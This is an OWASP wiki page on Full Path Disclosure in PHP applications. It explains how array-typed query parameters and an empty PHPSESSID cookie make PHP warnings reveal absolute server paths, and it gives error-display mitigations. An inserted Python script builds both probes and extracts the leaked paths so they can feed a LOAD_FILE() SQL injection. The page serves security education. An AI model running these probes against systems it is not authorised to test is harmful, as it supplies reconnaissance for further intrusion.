
Difference between revisions of "Full Path Disclosure"

From OWASP
Revision as of 12:42, 16 February 2009

This is an Attack. To view all attacks, please see the Attack Category page.


Last revision: 02/16/2009



Description

Full Path Disclosure (FPD) vulnerabilities allow an attacker to learn the absolute filesystem path of the web root or of a particular file, e.g. /home/omg/htdocs/file/. On its own the path is only information, but several other attacks depend on it: reading a page's source through a SQL Injection with MySQL's load_file(), for example, requires the attacker to supply the full path to the file they wish to view.

Risk Factors

TBD

Examples

Empty Array

If a site requests a page through a query parameter like this:

http://site.com/index.php?page=about

we can append square brackets to the parameter name, which makes PHP parse the value as an array instead of a string:

http://site.com/index.php?page[]=about

A function that expected a string (opendir() here, elsewhere include() or a database call) receives an array, fails, and PHP's default warning reports the absolute path of the script:

Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84
Warning: pg_num_rows(): supplied argument ... in /usr/home/example/html/pie/index.php on line 131

Null Session Cookie

Another popular and very reliable way to produce an error containing a full path is to send the page an empty (null) session id. From the browser's address bar this can be done with a javascript: URL that overwrites the PHPSESSID cookie:

javascript:void(document.cookie="PHPSESSID=");

Any HTTP client can do the same by sending a Cookie header whose PHPSESSID value is empty. session_start() rejects the empty session id as invalid and, with errors displayed, reports the path of the file that starts the session:

Warning: session_start() [function.session-start]: The session id contains illegal characters, 
valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2

The simplest mitigation is to stop PHP from printing its errors into the response, so the code never spits a path out to the client:

error_reporting(0);

This also hides the errors from the server operator, so in production it is better to keep them logged but not displayed (display_errors set to Off and log_errors set to On in php.ini) and to validate request parameters, rejecting an array where a string is expected, so that the underlying faults do not occur at all.
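The two probes above, and a check for the paths they leak, as an added example in Python (this is not code from the OWASP page): build_probes() turns the page=about request into the page[]=about variant and the empty-PHPSESSID request, extract_disclosed_paths() pulls every "in /abs/path on line N" tail out of a response body, and disclosed_directories() derives the directories an attacker would then use, for instance as the prefix of a load_file() target. The site.com URL and the sample responses are constructed from the warnings quoted on this page, and the function names are the example's own.

```python
"""Generate the two FPD probes described on this page and extract leaked
absolute paths from PHP error output.  Added example; the sample responses
below are constructed from the warnings quoted on the page."""
import posixpath
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Tail of a PHP diagnostic: "... in /abs/path/file.php on line 84".
# Accepts Unix and Windows absolute paths; HTML tags are stripped first so
# html_errors=On output ("in <b>/path</b> on line <b>84</b>") also matches.
PHP_ERROR_TAIL_RE = re.compile(
    r"\bin\s+(?P<path>(?:/|[A-Za-z]:\\)\S+?)\s+on\s+line\s+(?P<line>\d+)"
)
HTML_TAG_RE = re.compile(r"<[^>]+>")


def array_param_url(url: str) -> str:
    """Rewrite every query parameter as an array: page=about -> page[]=about.

    PHP then hands an array to functions expecting a string (opendir, include,
    pg_num_rows, ...), which emit a warning naming the script's absolute path."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    mutated = [(name + "[]", value) for name, value in params]
    return urlunsplit(parts._replace(query=urlencode(mutated, safe="[]")))


def build_probes(url: str) -> list:
    """The two probes from this page: empty-array parameter and empty PHPSESSID."""
    return [
        {"name": "empty-array", "url": array_param_url(url), "headers": {}},
        {"name": "null-session", "url": url, "headers": {"Cookie": "PHPSESSID="}},
    ]


def extract_disclosed_paths(body: str) -> list:
    """Return unique (path, line) pairs for every PHP error in a response body."""
    text = HTML_TAG_RE.sub("", body)
    found = []
    for m in PHP_ERROR_TAIL_RE.finditer(text):
        hit = (m.group("path"), int(m.group("line")))
        if hit not in found:
            found.append(hit)
    return found


def disclosed_directories(paths: list) -> list:
    """Directories an attacker learns from the leaked paths, e.g. the webroot
    that a MySQL LOAD_FILE() payload would need as a prefix."""
    dirs = []
    for path, _line in paths:
        d = posixpath.dirname(path.replace("\\", "/"))
        if d not in dirs:
            dirs.append(d)
    return dirs


# Constructed sample responses modelled on the warnings quoted on this page.
SAMPLE_RESPONSES = {
    "empty-array": (
        "<b>Warning</b>:  opendir(Array): failed to open dir: No such file or "
        "directory in <b>/home/omg/htdocs/index.php</b> on line <b>84</b><br />\n"
        "<b>Warning</b>:  pg_num_rows(): supplied argument is not a valid "
        "PostgreSQL result resource in <b>/usr/home/example/html/pie/index.php</b> "
        "on line <b>131</b><br />\n"
    ),
    "null-session": (
        "Warning: session_start() [function.session-start]: The session id "
        "contains illegal characters, valid characters are a-z, A-Z, 0-9 and "
        "'-,' in /home/example/public_html/includes/functions.php on line 2\n"
    ),
    # With display_errors=Off the same faults produce no path in the response.
    "hardened": "<html><body>Page not found</body></html>",
}

if __name__ == "__main__":
    for probe in build_probes("http://site.com/index.php?page=about"):
        print(probe["name"], probe["url"], probe["headers"])
        leaks = extract_disclosed_paths(SAMPLE_RESPONSES[probe["name"]])
        print("  leaked:", leaks, "dirs:", disclosed_directories(leaks))
    print("hardened:", extract_disclosed_paths(SAMPLE_RESPONSES["hardened"]))
```

Run it directly to print the probes and the leaks found in the constructed responses; against a live target, send each probe's url and headers with an HTTP client and pass the response body to extract_disclosed_paths(). The regex also matches PHP's HTML-formatted errors and Windows paths, which the page's examples do not show.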

Related Threat Agents

Related Attacks

Related Vulnerabilities

  • None

Related Controls


References